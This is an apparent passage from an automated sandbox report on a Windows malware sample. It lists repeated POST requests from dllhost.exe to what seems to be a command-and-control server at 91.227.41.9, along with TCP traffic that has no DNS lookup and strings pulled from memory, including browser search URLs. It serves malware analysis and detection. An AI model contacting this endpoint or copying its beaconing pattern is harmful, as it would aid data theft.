Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1836Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 2536Expect: 100-continue

Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9
Source: unknown	TCP traffic detected without corresponding DNS query: 91.227.41.9

Source: unknown

HTTP traffic detected: POST /imagePipepolldletemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 91.227.41.9Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: dllhost.exe, 00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.227.41.9
Source: dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.227.41.9/
Source: dllhost.exe, 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.000000000315B000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.227.41.9/imagePipepolldletemp.php
Source: eu6OEBpBCI.exe, 00000000.00000002.1686320496.00000000032E7000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 